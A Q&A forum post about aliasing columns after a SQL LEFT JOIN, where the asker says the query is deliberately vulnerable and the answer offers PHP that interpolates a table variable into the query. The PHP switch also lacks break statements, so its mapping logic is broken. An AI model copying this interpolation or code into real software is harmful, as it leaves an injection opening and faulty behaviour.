Assigning names to fields SQL

Question

I'm asking a quick question, I've being trying to solve this challenge for a while (for my own benefit).

How do I set the name of a field after a selection of all columns in a table.

See below for code snippet

SELECT * 
FROM `random$table` 
LEFT JOIN users AS u AND u.username AS title ON u.rank > 4 
WHERE u.username = 'exploit' 
GROUP BY `id` LIMIT 1

As you see can from the above snippet, I'm trying to assign a given name to a field after LEFT JOINING it.

AND u.username AS title

I couldn't find any other question related to this issue, please mark as duplicate if there is.

Side Note: Query is vulnerable for a reason

Thanks kind regards

Answer 1

You cannot do that after the query. Instead set the aliases inside of your SELECT expression. Perhaps you need some sort of mapping so based on your $table value you will have and $array of field=>alias matching, which you will put with join(',', $array) into the SELECT expression.

Something like that:

    function mapFields($table) {
        $mapping = [];


        switch($table) {
            case 'abc': {
                $mapping = [
                    $table.'.id' => 'id',
                    $table.'.rank' => 'rank',
                    $table.'.title' => 'title'
                ];
            }
            case 'xyz': {
                $mapping = [
                    $table.'.id' => 'userId',
                    $table.'.username' => 'username',
                    $table.'.email' => 'userEmail'
                ];
            }
        }

        return array_map(
            function($k, $v){return "$k as $v";}, 
            array_keys($mapping), 
            $mapping
        );
    }

    $mapping = mapFields('random'.$table);

    // do propper checks if the mapping array is empty or so


    $select = join(',', $mapping);



    SELECT $select
    FROM `random$table`